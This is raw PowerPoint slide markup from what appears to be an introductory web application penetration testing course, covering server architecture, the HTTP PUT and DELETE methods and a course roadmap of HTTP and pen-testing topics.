        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Data Store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47110" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="2286000"/>
            <a:ext cx="914400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47111" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5788025" y="5040313"/>
            <a:ext cx="612775" cy="446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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47112" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1905000"/>
            <a:ext cx="663575" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47113" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6242844" y="2977356"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="3333CC"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47114" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="3530600"/>
            <a:ext cx="663575" cy="444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Proxy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47115" name="Up-Down Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="4051300"/>
            <a:ext cx="609600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49997"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF66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342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47116" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6242844" y="4577556"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="3333CC"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47117" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="4203700"/>
            <a:ext cx="2073275"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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>HTTP travels across tunnel using other methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47118"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3352800"/>
            <a:ext cx="609600" cy="871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119"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1828800"/>
            <a:ext cx="609600" cy="871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12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5105400"/>
            <a:ext cx="609600" cy="871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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PUT/DELETE Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1645920"/>
            <a:ext cx="8229600" cy="4373880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PUT uploads data to the location specified by the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The data to upload is the HTTP payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DELETE removes the resource specified by the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Could lead to denial of service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can also change configurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Deleting a .htaccess file is an example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Neither of these methods typically supported on public Internet-facing servers… we hope!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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
